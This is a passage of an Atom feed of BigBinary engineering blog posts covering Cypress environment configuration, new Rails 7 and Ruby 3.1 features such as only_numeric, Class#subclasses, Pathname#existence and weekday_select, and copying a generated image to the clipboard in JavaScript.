&quot;execTimeout&quot;: 18000,  &quot;defaultCommandTimeout&quot;: 300000,  &quot;requestTimeout&quot;: 10000,  &quot;pageLoadTimeout&quot;: 30000,  &quot;responseTimeout&quot;: 10000,  &quot;viewportWidth&quot;: 1200,  &quot;viewportHeight&quot;: 1200,  &quot;videoUploadOnPasses&quot;: false,  &quot;retries&quot;: {    &quot;runMode&quot;: 1,    &quot;openMode&quot;: 2  }}</code></pre><pre><code class="language-javascript">// cypress/config/cypress.test.json{  &quot;baseUrl&quot;: &quot;https://test.example.com&quot;,  &quot;env&quot;: {    &quot;environment&quot;: &quot;test&quot;  },  &quot;execTimeout&quot;: 300000,  &quot;defaultCommandTimeout&quot;: 60000,  &quot;requestTimeout&quot;: 20000,  &quot;pageLoadTimeout&quot;: 60000,  &quot;responseTimeout&quot;: 20000,  &quot;viewportWidth&quot;: 1200,  &quot;viewportHeight&quot;: 1200,  &quot;videoUploadOnPasses&quot;: true,  &quot;retries&quot;: {    &quot;runMode&quot;: 2,    &quot;openMode&quot;: 1  }}</code></pre><pre><code class="language-javascript">// cypress/config/cypress.production.json{  &quot;baseUrl&quot;: &quot;https://live.example.com&quot;,  &quot;env&quot;: {    &quot;environment&quot;: &quot;production&quot;  },  &quot;execTimeout&quot;: 300000,  &quot;defaultCommandTimeout&quot;: 60000,  &quot;requestTimeout&quot;: 20000,  &quot;pageLoadTimeout&quot;: 60000,  &quot;responseTimeout&quot;: 20000,  &quot;viewportWidth&quot;: 1200,  &quot;viewportHeight&quot;: 1200,  &quot;videoUploadOnPasses&quot;: true,  &quot;retries&quot;: {    &quot;runMode&quot;: 2,    &quot;openMode&quot;: 1  }}</code></pre><h2>2. Initialize config files</h2><p>After adding config folder, we need to tell cypress about those config files. Wecan do that by updating <code>plugins/index.js</code> with following code. This file getsexecuted after we start the cypress server.</p><pre><code class="language-javascript">// cypress/plugins/index.jsconst fs = require(&quot;fs-extra&quot;);const path = require(&quot;path&quot;);const fetchConfigurationByFile = file =&gt; {  const pathOfConfigurationFile = `config/cypress.${file}.json`;  return (    file &amp;&amp; fs.readJson(path.join(__dirname, &quot;../&quot;, pathOfConfigurationFile))  );};module.exports = (on, config) =&gt; {  const environment = config.env.configFile || &quot;development&quot;;  const configurationForEnvironment = fetchConfigurationByFile(environment);  return configurationForEnvironment || config;};</code></pre><p>In the above code, <code>Cypress</code> loads the configuration file based on theenvironment. When we run <code>Cypress</code> we can pass environment variables. In thiscase, we need to pass <code>configFile</code> as an environment variable. If we don't pass<code>configFile</code>, by default <code>Cypress</code> will consider <code>development</code> as the currentenvironment.</p><h2>3. Setup scripts</h2><p>Cypress can accept command-line arguments. We can set the environment by passingthese arguments in the <code>cypress run</code> or <code>cypress open</code> command e.g.<code>cypress open --env configFile=test</code>. This command looks lengthy. Also,sometimes we need to pass more command-line arguments along with <code>configFile</code>.We can create short and handy commands by configuring the <code>package.json</code>.</p><p>For example: <code>yarn run cy:open:dev</code>.</p><pre><code class="language-javascript">// cypress/package.json&quot;cy:open:dev&quot;: &quot;cypress open --env configFile=development&quot;,&quot;cy:open:dev:chrome&quot;: &quot;cypress open --browser chrome --env configFile=development&quot;,&quot;cy:run:dev&quot;: &quot;cypress run --env configFile=development&quot;,&quot;cy:open:staging&quot;: &quot;cypress open --env configFile=test&quot;,&quot;cy:run:staging&quot;: &quot;cypress run --env configFile=test&quot;,</code></pre><h2>4. Precedence of configuration</h2><p>By default, we have <code>cypress.json</code> in Cypress where some config can be added.The precedence of configuration is higher for the files in the <code>config</code> folderthan the <code>cypress.json</code>. So if we have some key <code>execTimeout</code> defined in both<code>cypress.json</code> and <code>cypress.test.json</code>. The value of <code>execTimeout</code> in the<code>cypress.test.json</code> will be considered.</p><p>Generally, the rule of thumb is that a common configuration for all theenvironments can be kept in the <code>cypress.json</code>. The environment-specific configcan be kept in <code>config/</code> folder.</p><h2>Conclusion</h2><p>We saw that how we can configure the cypress in multiple environments. In thisway we can run Cypress for each environment without much hassle. This definitelyhelps us in running Cypress in both local as well as in the productionenvironment.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds only_numeric option to numericality validator]]></title>
       <author><name>Aditya Bhutani</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-only_numeric-option-to-numericality-validator"/>
      <updated>2022-01-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-only_numeric-option-to-numericality-validator</id>
      <content type="html"><![CDATA[<p>Rails 7.0.1 introduces <code>only_numeric</code> option to the numericality validator whichspecifies whether the value has to be an instance of Numeric. The defaultbehavior is to attempt parsing the value if it is a String.</p><p>When the database field is a float column, the data will get serialized to thecorrect type. In the case of a JSON column, serialization doesn't take place.</p><p>As a resolution, Rails 7 has added <code>only_numeric</code> option to numericalityvalidator.</p><p>We will see it in action.</p><p>To demonstrate, we need to generate a table that has a json/jsonb column.</p><pre><code class="language-ruby"># migrationcreate_table :users do |t|  t.jsonb :personalend</code></pre><h3>Before Validation</h3><pre><code class="language-ruby"># Modelclass User &lt; ApplicationRecord  store_accessor :personal, %i[age tooltips]end</code></pre><pre><code class="language-ruby"># rails console&gt;&gt; User.create!(age: '29')=&gt; #&lt;User id: 1, preferences: {&quot;age&quot;=&gt;&quot;29&quot;}, created_at: Sun, 16 Jan 2022 14:09:43.045301000 UTC +00:00, updated_at: Sun, 16 Jan 2022 14:09:43.045301000 UTC +00:00&gt;</code></pre><h3>After Validation</h3><pre><code class="language-ruby"># Modelclass User &lt; ApplicationRecord  store_accessor :personal, %i[age tooltips]  validates_numericality_of :age, only_numeric: true, allow_nil: trueend</code></pre><pre><code class="language-ruby"># rails console&gt;&gt; User.create!(age: '29')=&gt; 'raise_validation_error': Validation failed: Age is not a number (ActiveRecord::RecordInvalid)&gt;&gt; User.create!(age: 29)=&gt; #&lt;User id: 2, preferences: {&quot;age&quot;=&gt;29}, created_at: Sun, 16 Jan 2022 14:15:44.599934000 UTC +00:00, updated_at: Sun, 16 Jan 2022 14:15:44.599934000 UTC +00:00&gt;</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/43914">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3.1 adds Class#subclasses]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-1-adds-class-subclasses"/>
      <updated>2021-12-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-1-adds-class-subclasses</id>
      <content type="html"><![CDATA[<p>Ruby 3.1 introduces the <code>Class#subclasses</code> method, which returns all classesdirectly inheriting from the receiver without including singleton classes.</p><p>We can see many implementations for calculating all subclasses of a particularclass from the Ruby community with different gems. The<a href="https://api.rubyonrails.org/classes/ActiveSupport/DescendantsTracker.html#method-c-subclasses">ActiveSupport::DescendantsTracker</a>is one of such implementations used in Rails framework. Finally, Ruby has addedthe <code>Class#subclasses</code> native implementation for it's 3.1 version release.</p><h2>After Ruby 3.1</h2><pre><code class="language-ruby">=&gt; class User; end=&gt; class Employee &lt; User; end=&gt; class Client &lt; User; end=&gt; class Manager &lt; Employee; end=&gt; class Developer &lt; Employee; end=&gt; User.subclasses=&gt; [Employee, Client]=&gt; Employee.subclasses=&gt; [Manager, Developer]=&gt; Developer.subclasses=&gt; []</code></pre><p>Here's the relevant <a href="https://github.com/ruby/ruby/pull/5045">pull request</a> and<a href="https://bugs.ruby-lang.org/issues/18273">feature discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Generating an image from an element and copying it to the clipboard using JavaScript]]></title>
       <author><name>Rishi Mohan</name></author>
      <link href="https://www.bigbinary.com/blog/copy-generated-image-clipboard-javascript"/>
      <updated>2021-12-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/copy-generated-image-clipboard-javascript</id>
      <content type="html"><![CDATA[<p>While most browsers support <code>navigator.clipboard.writeText</code> propertywhich is used to write a string to the clipboard,it gets a little tricky when you wantto copy an image to the clipboard.There's no common way to copya blob image to the clipboard for all browsers.</p><p>While working on an app that <a href="https://kizie.co/tools/twitter-image">generates image from a tweet</a>and lets you save it, I wanted to add the ability tolet users copy the image directly to clipboard.The implementation seemed simple untilI started working on it.The problem is that browsers have different specsfor writing a blob to the clipboard.</p><p>In this article, we'll learn to write a functionthat generates an image from an elementand saves it in the clipboard.Also since browsers handle things differently,we'll see how to copy an image to the clipboardwork on Safari and Chrome(and its variants).</p><h2>Things to know before we start</h2><ul><li>Unfortunately, there's no way(or I haven't found one)to copy a blob image to clipboard in Firefox.</li><li>There's no way to copy multiple imagesin one go.</li></ul><h2>Creating an image from an element</h2><p>Below is a function that utilises <code>domtoimage</code> libraryto return an image blob from the element <code>screenshotRef.current</code>.</p><p>We can use <code>yarn add dom-to-image</code> to install the package.</p><p>Instead of <code>screenshotRef.current</code> used in the function,we can pass the <code>id</code> or <code>className</code>of the element we want to generate the image from.More about how domtoimage workscan be learned <a href="https://github.com/tsayen/dom-to-image">here</a>.</p><pre><code class="language-js">const snapshotCreator = () =&gt; {  return new Promise((resolve, reject) =&gt; {    try {      const scale = window.devicePixelRatio;      const element = screenshotRef.current; // You can use element's ID or Class here      domtoimage        .toBlob(element, {          height: element.offsetHeight * scale,          width: element.offsetWidth * scale,          style: {            transform: &quot;scale(&quot; + scale + &quot;)&quot;,            transformOrigin: &quot;top left&quot;,            width: element.offsetWidth + &quot;px&quot;,            height: element.offsetHeight + &quot;px&quot;,          },        })        .then((blob) =&gt; {          resolve(blob);        });    } catch (e) {      reject(e);    }  });};</code></pre><h2>Copying an image to clipboard in Safari</h2><p>First, we'll need a check to see if the browseris Safari. You can use below check to detect Safari.</p><pre><code class="language-js">const isSafari = /^((?!chrome|android).)*safari/i.test(  navigator?.userAgent);</code></pre><p>Now that we have the check, we can use the functionto copy the image to clipboard.</p><pre><code class="language-js">const copyImageToClipBoardSafari = () =&gt; {  if(isSafari) {    navigator.clipboard      .write([        new ClipboardItem({          &quot;image/png&quot;: new Promise(async (resolve, reject) =&gt; {            try {              const blob = await snapshotCreator();              resolve(new Blob([blob], { type: &quot;image/png&quot; }));            } catch (err) {              reject(err);            }          }),        }),      ])      .then(() =&gt;        // Success      )      .catch((err) =&gt;        // Error        console.error(&quot;Error:&quot;, err)      );  }}</code></pre><p>We're using <code>navigation.clipboard.write</code> propertyto write an image blob to clipboard. Inside it,we're creating a new ClipboardItem from the blobof the element which is generated from <code>snapshotCreator()</code>function which we created in first step.</p><h2>Copying an image to clipboard in other browsers</h2><p>Since this method doesn't work in Firefox, we'll need a checkto make sure we're not running it on Firefox.Below condition takes care of that.</p><pre><code class="language-js">const isNotFirefox = navigator.userAgent.indexOf(&quot;Firefox&quot;) &lt; 0;</code></pre><p>Now that we have the check, we'll usethe same technique as we used for Safari,but this time we'll need to ask the browserfor the <code>navigator</code> permissions.</p><p>Below is the function that does thatand then copies the blob image to the clipboardin Chrome browser and its variants.</p><pre><code class="language-js">const copyImageToClipBoardOtherBrowsers = () =&gt; {  if(isNotFirefox) {    navigator?.permissions      ?.query({ name: &quot;clipboard-write&quot; })      .then(async (result) =&gt; {        if (result.state === &quot;granted&quot;) {          const type = &quot;image/png&quot;;          const blob = await snapshotCreator();          let data = [new ClipboardItem({ [type]: blob })];          navigator.clipboard            .write(data)            .then(() =&gt; {              // Success            })            .catch((err) =&gt; {              // Error              console.error(&quot;Error:&quot;, err)            });        }    });  } else {    alert(&quot;Firefox does not support this functionality&quot;);  }}</code></pre><p>The difference is not much except thatChrome and its variants require asking for<code>navigator.permissions</code> before we canwrite the blob content to clipboard.The above function uses the same <code>snapshotCreator()</code>function from the first step tocreate an image from the element.</p><p>We can combine both the functionstogether to have this functionality workin Safari and Chrome browser.You can check how it works on <a href="https://kizie.co/tools/twitter-image">this page</a>,just click on &quot;Copy Image&quot; buttonand then you'll be able paste the image anywhere.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds Pathname#existence]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-pathname-existence"/>
      <updated>2021-12-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-pathname-existence</id>
      <content type="html"><![CDATA[<p>Rails 7 introduces<a href="https://api.rubyonrails.org/classes/Pathname.html#method-i-existence"><code>Pathname#existence</code></a>method, which returns the receiver if the given file path exists, otherwisereturns nil.</p><h3>Before</h3><p>We need to first check whether the given file path exists or not to perform anyother operations on it.</p><pre><code class="language-ruby">=&gt; file_path = &quot;config/schedule.yml&quot;=&gt; Pathname.new(file_path).read if Pathname.new(file_path).exist?</code></pre><h3>Rails 7 onwards</h3><p>The <code>Pathname#existence</code> method acts like <code>Object#presence</code> for file existence.</p><pre><code class="language-ruby">=&gt; file_path = &quot;config/schedule.yml&quot;=&gt; Pathname.new(file_path).existence&amp;.read</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/43726">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Fix slow page loads in a Ruby on Rails application by identifying n+1 queries]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/fix-slow-page-loads-in-a-ruby-on-rails-application"/>
      <updated>2021-12-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/fix-slow-page-loads-in-a-ruby-on-rails-application</id>
      <content type="html"><![CDATA[<p>In one of our internal products, we received complaints about slow page loads and longer response times on a specific page. Our team members used New Relic to identify the cause of the slowness and resolve the issue. After the issue was resolved, I made a video for internal purposes. In this blog we are posting that video as it was recorded.</p><p>&lt;iframe width=&quot;100%&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/pmCcey4BiG0&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds accepts_nested_attributes_for support for delegated_type]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-accepts-nested-attributes-for-support-for-delegated_type"/>
      <updated>2021-11-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-accepts-nested-attributes-for-support-for-delegated_type</id>
      <content type="html"><![CDATA[<p>Rails 6.1 introduced the <code>delegated_type</code> to Active Record, which makes it easierfor models to share responsibilities. Please see our<a href="https://www.bigbinary.com/blog/rails-6-1-adds-delegated-type-to-active-record">blog</a>to read more about <code>delegated_type</code>.</p><pre><code class="language-ruby">class Entry &lt; ApplicationRecord  # Schema  #  entryable_type, entryable_id, ...  delegated_type :entryable, types: %w[ Message Comment ]endclass Message  # Schema  #  subject, ...endclass Comment  # Schema    #  content, ...end</code></pre><p>The <code>accepts_nested_attributes_for</code> option is very helpful while handling nestedforms. We can easily create and update associated records by passing detailsalong with the main object parameters when the <code>accepts_nested_attributes_for</code>option is enabled.</p><h3>Before</h3><p>The <code>accepts_nested_attributes_for</code> option is not available for<code>delegated_type</code>, hence we can't use nested forms for associated objectsconfigured via <code>delegated_type</code>.</p><h3>Rails 7 onwards</h3><p>Rails 7 adds <code>accepts_nested_attributes_for</code> support to <code>delegated_type</code>, whichallows to create and update records easily without needing to write specificmethods or logic.</p><pre><code class="language-ruby">class Entry &lt; ApplicationRecord  delegated_type :entryable, types: %w[ Message Comment ]  accepts_nested_attributes_for :entryableendparams = {  entry: {    entryable_type: 'Message',    entryable_attributes: { subject: 'Delegated Type' }  }}message_entry = Entry.create(params[:entry])params = {  entry: {    entryable_type: 'Comment',    entryable_attributes: { content: 'Looks Cool!' }  }}comment_entry = Entry.create(params[:entry])</code></pre><p>If we want to deal with more logic or validations while creating the entryableobjects, we'll have to create a method specifically and do the logic there.</p><pre><code class="language-ruby">class Entry &lt; ApplicationRecord  def self.create_with_comment(content)    # Validation logic goes here    create! entryable: Comment.new(content: content)  endend</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/41717">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 Adds from option to ActiveSupport::TestCase#assert_no_changes]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-from-option-to-assert_no_changes"/>
      <updated>2021-11-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-from-option-to-assert_no_changes</id>
      <content type="html"><![CDATA[<p>Rails<a href="https://guides.rubyonrails.org/active_support_core_extensions.html">Active Support</a>provides various extensions, utilities, and helpers. It provides a collection ofutility classes and standard library extensions that are very useful.</p><p>Rails 5.1 introduced <code>assert_no_changes</code> and <code>assert_changes</code>, making it easierto observe changes. Using<a href="https://api.rubyonrails.org/classes/ActiveSupport/Testing/Assertions.html#method-i-assert_no_changes">ActiveSupport::TestCase#assert_no_changes</a>we can easily assert that the result of evaluating an expression has not changedbefore and after calling the passed block.</p><p>To assert the expected change in the value of an object, we can use<code>assert_changes</code>.</p><pre><code class="language-ruby">assert_changes -&gt; { user.address } do  user.update address: 'Miami'end</code></pre><p><code>assert_changes</code> also supports <code>from</code> and <code>to</code> options.</p><pre><code class="language-ruby">assert_changes -&gt; { user.address }, from: 'San Francisco', to: 'Miami' do  user.update address: 'Miami'end</code></pre><p>Similarly, <code>assert_no_changes</code> allows us to assert a value that is expected tonot change.</p><pre><code class="language-ruby">assert_no_changes -&gt; { user.address } do  user.update address: 'Miami'end</code></pre><p>We can also specify an error message with <code>assert_no_changes</code>.</p><pre><code class="language-ruby">assert_no_changes -&gt; { user.address }, 'Expect the address to not change' do  user.update address: 'Miami'end</code></pre><h3>Before</h3><p><code>assert_no_changes</code> did not support the <code>from</code> option, similar to<code>assert_changes</code>.</p><pre><code class="language-ruby">assert_no_changes -&gt; { user.address } do  user.update address: 'Miami'end</code></pre><p>However,<a href="https://github.com/rails/rails/pull/42277">Rails 7 has added from: option to ActiveSupport::TestCase#assert_no_changes</a>,allowing us to assert on the initial value that is expected to not change.</p><h3>Rails 7 onwards</h3><p>Provides the optional <code>from</code> argument to specify the expected initial value.</p><pre><code class="language-ruby">assert_no_changes -&gt; { user.address }, from: 'San Francisco' do  user.update address: 'Miami'end</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/42277">pull request</a> formore details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3.1 adds MatchData#match & MatchData#match_length]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-1-adds-match-data-methods"/>
      <updated>2021-11-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-1-adds-match-data-methods</id>
      <content type="html"><![CDATA[<p>Ruby 3.1 introduces the <code>MatchData#match</code> &amp; <code>MatchData#match_length</code> methodswhich returns the substring matched against a regular expression &amp; it's lengthrespectively.</p><pre><code class="language-ruby">=&gt; str = &quot;Ruby 3.1 introduces MatchData#match method&quot;=&gt;  m = /(?&lt;lang&gt;\S+)(\s)(?&lt;version&gt;[\d\.]+)/.match(str)=&gt; #&lt;MatchData &quot;Ruby 3.1&quot; lang:&quot;Ruby&quot; version:&quot;3.1&quot;&gt;</code></pre><h3>Before Ruby 3.1</h3><p>We have <code>MatchData#[]</code> method to access all the substring groups that arematched. We can access either a single match or multiple matches by giving asingle index or a range of indexes, respectively, using <code>MatchData#[]</code> method.</p><pre><code class="language-ruby">=&gt; m[:lang]=&gt; &quot;Ruby&quot;=&gt; m[1]=&gt; &quot;Ruby&quot;=&gt; m[:version]=&gt; &quot;3.1&quot;=&gt; m[0..2]=&gt; [&quot;Ruby 3.1&quot;, &quot;Ruby&quot;, &quot;3.1&quot;]=&gt; m[1..2]=&gt; [&quot;Ruby&quot;, &quot;3.1&quot;]=&gt; m[0].length=&gt; 8</code></pre><h3>After Ruby 3.1</h3><p>We have two new methods now to access the match data &amp; its length. The<code>MatchData#match</code> &amp; <code>MatchData#match_length</code> methods accepts either an index ora symbol as an argument to return the match data &amp; its length.</p><pre><code class="language-ruby">=&gt; m.match(0)=&gt; &quot;Ruby 3.1&quot;=&gt; m.match(:version)=&gt; &quot;3.1&quot;=&gt; m.match(3)=&gt; nil=&gt; m.match_length(0)=&gt; 8=&gt; m.match_length(:version)=&gt; 3=&gt; m.match_length(3)=&gt; nil</code></pre><p>Please note that <code>MatchData#match</code> is not same as <code>MatchData#[]</code> method. Thelater accepts an optional length or range as an argument to return the matcheddata but the former doesn't accept it, instead it allows only a single index orsymbol as an argument.</p><p>Here's the relevant <a href="https://github.com/ruby/ruby/pull/4851">pull request</a> and<a href="https://bugs.ruby-lang.org/issues/18172">feature discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 replaced byebug with ruby/debug]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-replaced-byebug-with-ruby-debug"/>
      <updated>2021-11-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-replaced-byebug-with-ruby-debug</id>
      <content type="html"><![CDATA[<p>Rails 5 introduced <a href="https://github.com/deivid-rodriguez/byebug">byebug</a> which isan easy-to-use, feature-rich ruby debugger. It offers features like <code>Stepping</code>,<code>Breaking</code>, <code>Evaluating</code>, <code>Tracking</code>.</p><p>Using <a href="https://github.com/deivid-rodriguez/byebug">byebug</a> we can easily controlthe execution of a program and the debug inspector for call stack navigation.This allows us to handle and track the execution flow.</p><p>Here is<a href="https://guides.rubyonrails.org/debugging_rails_applications.html#debugging-with-the-byebug-gem">byebug documentation</a>and here is the <a href="https://github.com/rails/rails/pull/14646">pull request</a> whereit was added.</p><p><a href="https://github.com/rails/rails/pull/43187">Rails 7 is replacing byebug with ruby/debug</a>.<code>debug</code> is Rubys new debugger, which will be included in Ruby 3.1. To alignRails with Ruby <code>debug</code> has been added to Rails 7.</p><p>Let's see an example of debugging with both Byebug and Debug.</p><h3>Before</h3><p>Let's assume we have a <code>NameController</code>. Inside any Rails application, you cancall the debugger by calling the <code>byebug</code> method.</p><pre><code class="language-ruby"># app/controllers/name_controller.rbclass NameController &lt; ApplicationController  def index    name = &quot;John Doe&quot;    byebug # Call to debugger    city = &quot;San Francisco&quot;  endend</code></pre><p>Then the invoked debugger results in the following.</p><pre><code class="language-ruby">    [1, 7] in app/controllers/test_controller.rb    1: class NameController &lt; ApplicationController    2:   def index    3:     name = &quot;John Doe&quot;    4:     byebug # Call to debugger=&gt;  5:    city = &quot;San Francisco&quot;    6:   end    7: end  (byebug) name # variable call  &quot;John Doe&quot;</code></pre><h3>Rails 7 onwards</h3><p>We can use the <code>binding.break</code> method for calling Ruby Debug.</p><pre><code class="language-ruby"># app/controllers/name_controller.rbclass NameController &lt; ApplicationController  def index    name = &quot;John Doe&quot;    binding.break # Call to debugger    city = &quot;San Francisco&quot;  endend</code></pre><p>The invoked debugger results in the following.</p><pre><code class="language-ruby">  [1, 7] in app/controllers/test_controller.rb  1| class NameController &lt; ApplicationController  2|   def index  3|     name = &quot;John Doe&quot;  4|     binding.break # Call to debugger&gt; 5|    city = &quot;San Francisco&quot;  6|   end  7| end&gt;#0 NameController#index at ~/demo_app/app/controllers/name_controller.rb:5  #1  ActionController::BasicImplicitRender#send_action(method=&quot;index&quot;, args=[])(rdbg) name # variable call&quot;John Doe&quot;</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/43187">pull request</a> formore details and for commands or features of Ruby Debug, please visit<a href="https://github.com/ruby/debug">Ruby-Debug</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds weekday_options_for_select and weekday_select]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-weekday_options_for_select-and-weekday_select"/>
      <updated>2021-11-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-weekday_options_for_select-and-weekday_select</id>
      <content type="html"><![CDATA[<p>In web applications, forms are one of the most essential interfaces for userinput, and it can be tedious to write and maintain form markups with manyattributes. Rails provide<a href="https://guides.rubyonrails.org/form_helpers.html">Action View Form Helpers</a> forgenerating form markup.</p><p>Using<a href="https://guides.rubyonrails.org/form_helpers.html#making-select-boxes-with-ease">select</a>helper we can easily create select boxes in HTML with one <code>&lt;option&gt;</code> element foreach option to choose from.</p><p>For example, let's say we have a list of cities for the user to choose from.</p><pre><code class="language-ruby"># app/views/address/new.html.erb&lt;%= form.select :city, [&quot;Pune&quot;, &quot;Mumbai&quot;, &quot;Delhi&quot;] %&gt;</code></pre><p>Rails will generate the following markup.</p><pre><code class="language-html">&lt;select name=&quot;city&quot; id=&quot;city&quot;&gt;  &lt;option value=&quot;Pune&quot;&gt;Pune&lt;/option&gt;  &lt;option value=&quot;Mumbai&quot;&gt;Mumbai&lt;/option&gt;  &lt;option value=&quot;Delhi&quot;&gt;Delhi&lt;/option&gt;&lt;/select&gt;</code></pre><p>Previously for generating a select box for weekday select, we needed to write acustom helper. Rails did not have anything out of the box for the weekdayselection.</p><p>However,<a href="https://github.com/rails/rails/pull/42979">Rails 7 has added weekday_options_for_select and weekday_select</a>using which we can easily generate a dropdown field of selecting a weekday.</p><h3>Before</h3><p>In Rails 6.1, we can create a dropdown field for weekdays as shown here.</p><pre><code class="language-ruby"># app/views/users/new.html.erb&lt;%= form_with(model: user) do |form| %&gt;  &lt;div class=&quot;field&quot;&gt;    &lt;%= form.label :weekly_off %&gt;    &lt;%= form.select :weekly_off, I18n.t('date.day_names') %&gt;  &lt;/div&gt;&lt;% end %&gt;</code></pre><p>Or we can do something like this.</p><pre><code class="language-ruby"># app/views/users/new.html.erb&lt;%= form_with(model: user) do |form| %&gt;  &lt;div class=&quot;field&quot;&gt;    &lt;%= form.label :weekly_off %&gt;    &lt;%= form.select :weekly_off, I18n.t('date.day_names').map.with_index.to_h %&gt;  &lt;/div&gt;&lt;% end %&gt;</code></pre><p>Then the generated markup looks like this.</p><pre><code class="language-html">&lt;select name=&quot;user[weekly_off]&quot; id=&quot;user_weekly_off&quot;&gt;  &lt;option value=&quot;Sunday&quot;&gt;Sunday&lt;/option&gt;  &lt;option value=&quot;Monday&quot;&gt;Monday&lt;/option&gt;  &lt;option value=&quot;Tuesday&quot;&gt;Tuesday&lt;/option&gt;  &lt;option value=&quot;Wednesday&quot;&gt;Wednesday&lt;/option&gt;  &lt;option value=&quot;Thursday&quot;&gt;Thursday&lt;/option&gt;  &lt;option value=&quot;Friday&quot;&gt;Friday&lt;/option&gt;  &lt;option value=&quot;Saturday&quot;&gt;Saturday&lt;/option&gt;&lt;/select&gt;</code></pre><p>Here is how it would look if we go with the second option.</p><pre><code class="language-html">&lt;select name=&quot;user[weekly_off]&quot; id=&quot;user_weekly_off&quot;&gt;  &lt;option value=&quot;0&quot;&gt;Sunday&lt;/option&gt;  &lt;option value=&quot;1&quot;&gt;Monday&lt;/option&gt;  &lt;option value=&quot;2&quot;&gt;Tuesday&lt;/option&gt;  &lt;option value=&quot;3&quot;&gt;Wednesday&lt;/option&gt;  &lt;option value=&quot;4&quot;&gt;Thursday&lt;/option&gt;  &lt;option value=&quot;5&quot;&gt;Friday&lt;/option&gt;  &lt;option value=&quot;6&quot;&gt;Saturday&lt;/option&gt;&lt;/select&gt;</code></pre><h3>Rails 7 onwards</h3><p>We can use the <code>weekday_options_for_select</code> or <code>weekday_select</code> helper forgenerating a dropdown field for selecting a weekday.</p><pre><code class="language-ruby"># app/views/users/new.html.erb&lt;%= form_with(model: user) do |form| %&gt;  &lt;div class=&quot;field&quot;&gt;    &lt;%= form.label :weekly_off %&gt;    &lt;%= form.select :weekly_off, weekday_options_for_select(&quot;Monday&quot;, day_format: :abbr_day_names) %&gt;  &lt;/div&gt;&lt;% end %&gt;</code></pre><p>Or we can do something like this.</p><pre><code class="language-ruby"># app/views/users/new.html.erb&lt;%= form_with(model: user) do |form| %&gt;  &lt;div class=&quot;field&quot;&gt;    &lt;%= form.label :weekly_off %&gt;    &lt;%= form.weekday_select :weekly_off, { selected: &quot;Monday&quot;, day_format: :abbr_day_names } %&gt;  &lt;/div&gt;&lt;% end %&gt;</code></pre><p>Then The generated markup looks like this.</p><pre><code class="language-html">&lt;select name=&quot;user[weekly_off]&quot; id=&quot;user_weekly_off&quot;&gt;  &lt;option value=&quot;Sunday&quot;&gt;Sunday&lt;/option&gt;  &lt;option selected=&quot;selected&quot; value=&quot;Monday&quot;&gt;Monday&lt;/option&gt;  &lt;option value=&quot;Tuesday&quot;&gt;Tuesday&lt;/option&gt;  &lt;option value=&quot;Wednesday&quot;&gt;Wednesday&lt;/option&gt;  &lt;option value=&quot;Thursday&quot;&gt;Thursday&lt;/option&gt;  &lt;option value=&quot;Friday&quot;&gt;Friday&lt;/option&gt;  &lt;option value=&quot;Saturday&quot;&gt;Saturday&lt;/option&gt;&lt;/select&gt;</code></pre><p><code>weekday_options_for_select</code> accepts a few options and all of them have adefault value.</p><p><code>selected</code> defaults to nil and if we provide this argument, the value passed willbe used as the selected option.</p><pre><code class="language-html"> &lt;!-- weekday_options_for_select(&quot;Friday&quot;) --&gt;&lt;option value=\&quot;Sunday\&quot;&gt;Sunday&lt;/option&gt;\n&lt;option value=\&quot;Monday\&quot;&gt;Monday&lt;/option&gt;\n&lt;option value=\&quot;Tuesday\&quot;&gt;Tuesday&lt;/option&gt;\n&lt;option value=\&quot;Wednesday\&quot;&gt;Wednesday&lt;/option&gt;\n&lt;option value=\&quot;Thursday\&quot;&gt;Thursday&lt;/option&gt;\n&lt;option selected=\&quot;selected\&quot; value=\&quot;Friday\&quot;&gt;Friday&lt;/option&gt;\n&lt;option 